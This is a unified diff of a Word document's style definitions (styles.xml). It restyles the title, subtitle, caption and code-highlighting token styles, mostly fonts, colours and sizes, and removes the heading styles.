+      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+    <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="BodyText">
     <w:name w:val="Body Text"/>
@@ -10786,18 +11871,15 @@
     <w:pPr>
       <w:spacing w:before="180" w:after="180"/>
     </w:pPr>
-    <w:qFormat/>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
     <w:name w:val="First Paragraph"/>
     <w:basedOn w:val="BodyText"/>
     <w:next w:val="BodyText"/>
-    <w:qFormat/>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="Compact">
     <w:name w:val="Compact"/>
     <w:basedOn w:val="BodyText"/>
-    <w:qFormat/>
     <w:pPr>
       <w:spacing w:before="36" w:after="36"/>
     </w:pPr>
@@ -10805,35 +11887,40 @@
   <w:style w:type="paragraph" w:styleId="Title">
     <w:name w:val="Title"/>
     <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="TitleChar"/>
+    <w:uiPriority w:val="10"/>
     <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
     <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="480" w:after="240"/>
-      <w:jc w:val="center"/>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:contextualSpacing/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="345A8A" w:themeColor="accent1" w:themeShade="B5"/>
-      <w:sz w:val="36"/>
-      <w:szCs w:val="36"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:spacing w:val="-7"/>
+      <w:sz w:val="80"/>
+      <w:szCs w:val="80"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Subtitle">
     <w:name w:val="Subtitle"/>
-    <w:basedOn w:val="Title"/>
-    <w:next w:val="BodyText"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="SubtitleChar"/>
+    <w:uiPriority w:val="11"/>
     <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
     <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="240" w:after="240"/>
-      <w:jc w:val="center"/>
+      <w:numPr>
+        <w:ilvl w:val="1"/>
+      </w:numPr>
+      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
       <w:sz w:val="30"/>
       <w:szCs w:val="30"/>
     </w:rPr>
@@ -10841,7 +11928,6 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
     <w:name w:val="Author"/>
     <w:next w:val="BodyText"/>
-    <w:qFormat/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -10851,7 +11937,6 @@
   <w:style w:type="paragraph" w:styleId="Date">
     <w:name w:val="Date"/>
     <w:next w:val="BodyText"/>
-    <w:qFormat/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -10862,7 +11947,6 @@
     <w:name w:val="Abstract"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="BodyText"/>
-    <w:qFormat/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -10876,139 +11960,6 @@
   <w:style w:type="paragraph" w:styleId="Bibliography">
     <w:name w:val="Bibliography"/>
     <w:basedOn w:val="Normal"/>
-    <w:next w:val="Bibliography"/>
-    <w:qFormat/>
-    <w:pPr/>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading1">
-    <w:name w:val="Heading 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
-    <w:uiPriority w:val="9"/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="480" w:after="0"/>
-      <w:outlineLvl w:val="0"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="345A8A" w:themeColor="accent1" w:themeShade="B5"/>
-      <w:sz w:val="32"/>
-      <w:szCs w:val="32"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading2">
-    <w:name w:val="Heading 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
-      <w:outlineLvl w:val="1"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="32"/>
-      <w:szCs w:val="32"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading3">
-    <w:name w:val="Heading 3"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
-      <w:outlineLvl w:val="2"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="28"/>
-      <w:szCs w:val="28"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading4">
-    <w:name w:val="Heading 4"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
-      <w:outlineLvl w:val="3"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="24"/>
-      <w:szCs w:val="24"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading5">
-    <w:name w:val="Heading 5"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
-      <w:outlineLvl w:val="4"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:i/>
-      <w:iCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="24"/>
-      <w:szCs w:val="24"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading6">
-    <w:name w:val="Heading 6"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="BodyText"/>
-    <w:uiPriority w:val="9"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
-      <w:outlineLvl w:val="5"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="24"/>
-      <w:szCs w:val="24"/>
-    </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="BlockText">
     <w:name w:val="Block Text"/>
@@ -11016,10 +11967,8 @@
     <w:next w:val="BodyText"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
-    <w:qFormat/>
     <w:pPr>
       <w:spacing w:before="100" w:after="100"/>
-      <w:ind w:firstLine="0"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
@@ -11029,32 +11978,10 @@
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="FootnoteText">
-    <w:name w:val="Footnote Text"/>
+    <w:name w:val="footnote text"/>
     <w:basedOn w:val="Normal"/>
-    <w:next w:val="FootnoteText"/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
-    <w:name w:val="Default Paragraph Font"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
-    <w:name w:val="Normal Table"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="DefinitionTerm">
     <w:name w:val="Definition Term"/>
@@ -11074,14 +12001,23 @@
     <w:basedOn w:val="Normal"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Caption">
-    <w:name w:val="Caption"/>
+    <w:name w:val="caption"/>
     <w:basedOn w:val="Normal"/>
-    <w:link w:val="BodyTextChar"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="CaptionChar"/>
+    <w:uiPriority w:val="35"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
     <w:pPr>
-      <w:spacing w:before="0" w:after="120"/>
+      <w:spacing w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:rPr>
-      <w:i/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableCaption">
@@ -11099,286 +12035,789 @@
     <w:name w:val="Figure"/>
     <w:basedOn w:val="Normal"/>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FigureWithCaption">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FigurewithCaption">
     <w:name w:val="Figure with Caption"/>
     <w:basedOn w:val="Figure"/>
     <w:pPr>
       <w:keepNext/>
     </w:pPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
-    <w:name w:val="Body Text Char"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="CaptionChar">
+    <w:name w:val="Caption Char"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="BodyText"/>
+    <w:link w:val="Caption"/>
+    <w:uiPriority w:val="35"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimChar">
     <w:name w:val="Verbatim Char"/>
-    <w:basedOn w:val="BodyTextChar"/>
+    <w:basedOn w:val="CaptionChar"/>
+    <w:link w:val="SourceCode"/>
     <w:rPr>
       <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
       <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:styleId="FootnoteReference">
-    <w:name w:val="Footnote Reference"/>
-    <w:basedOn w:val="BodyTextChar"/>
+    <w:name w:val="footnote reference"/>
+    <w:basedOn w:val="CaptionChar"/>
     <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
-    <w:basedOn w:val="BodyTextChar"/>
+    <w:basedOn w:val="CaptionChar"/>
     <w:rPr>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4472C4" w:themeColor="accent1"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="TOCHeading">
     <w:name w:val="TOC Heading"/>
     <w:basedOn w:val="Heading1"/>
-    <w:next w:val="BodyText"/>
+    <w:next w:val="Normal"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:rsid w:val="00B3198D"/>
     <w:pPr>
-      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
       <w:outlineLvl w:val="9"/>
     </w:pPr>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b w:val="0"/>
-      <w:bCs w:val="0"/>
-      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
-    </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
     <w:name w:val="Source Code"/>
     <w:basedOn w:val="Normal"/>
     <w:link w:val="VerbatimChar"/>
     <w:pPr>
-      <w:wordWrap w:val="off"/>
+      <w:wordWrap w:val="0"/>
     </w:pPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="KeywordTok">
     <w:name w:val="KeywordTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
       <w:color w:val="007020"/>
-      <w:b/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="DataTypeTok">
     <w:name w:val="DataTypeTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
       <w:color w:val="902000"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="DecValTok">
     <w:name w:val="DecValTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="40a070"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="40A070"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="BaseNTok">
     <w:name w:val="BaseNTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="40a070"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="40A070"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="FloatTok">
     <w:name w:val="FloatTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="40a070"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="40A070"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ConstantTok">
     <w:name w:val="ConstantTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
       <w:color w:val="880000"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="CharTok">
     <w:name w:val="CharTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4070a0"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4070A0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="SpecialCharTok">
     <w:name w:val="SpecialCharTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4070a0"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4070A0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="StringTok">
     <w:name w:val="StringTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4070a0"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4070A0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimStringTok">
     <w:name w:val="VerbatimStringTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4070a0"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="4070A0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="SpecialStringTok">
     <w:name w:val="SpecialStringTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="bb6688"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="BB6688"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ImportTok">
     <w:name w:val="ImportTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="CommentTok">
     <w:name w:val="CommentTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="60a0b0"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
       <w:i/>
+      <w:color w:val="60A0B0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="DocumentationTok">
     <w:name w:val="DocumentationTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="ba2121"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
       <w:i/>
+      <w:color w:val="BA2121"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="AnnotationTok">
     <w:name w:val="AnnotationTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="60a0b0"/>
-      <w:b/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
       <w:i/>
+      <w:color w:val="60A0B0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="CommentVarTok">
     <w:name w:val="CommentVarTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="60a0b0"/>
-      <w:b/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
       <w:i/>
+      <w:color w:val="60A0B0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="OtherTok">
     <w:name w:val="OtherTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
       <w:color w:val="007020"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="FunctionTok">
     <w:name w:val="FunctionTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="06287e"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="06287E"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="VariableTok">
     <w:name w:val="VariableTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="19177c"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="19177C"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ControlFlowTok">
     <w:name w:val="ControlFlowTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
       <w:color w:val="007020"/>
-      <w:b/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="OperatorTok">
     <w:name w:val="OperatorTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
       <w:color w:val="666666"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="BuiltInTok">
     <w:name w:val="BuiltInTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
     <w:name w:val="ExtensionTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="PreprocessorTok">
     <w:name w:val="PreprocessorTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="bc7a00"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="BC7A00"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="AttributeTok">
     <w:name w:val="AttributeTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="7d9029"/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="7D9029"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="RegionMarkerTok">
     <w:name w:val="RegionMarkerTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b/>
+      <w:bCs/>
+      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="InformationTok">
     <w:name w:val="InformationTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="60a0b0"/>
-      <w:b/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
       <w:i/>
+      <w:color w:val="60A0B0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="WarningTok">
     <w:name w:val="WarningTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="60a0b0"/>
-      <w:b/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
       <w:i/>
+      <w:color w:val="60A0B0"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="AlertTok">
     <w:name w:val="AlertTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="ff0000"/>
-      <w:b/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
+      <w:color w:val="FF0000"/>
+      <w:sz w:val="22"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ErrorTok">
     <w:name w:val="ErrorTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="ff0000"/>
-      <w:b/>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:b w:val="0"/>
+      <w:bCs/>
+      <w:color w:val="FF0000"/>
+      <w:sz w:val="22"/>
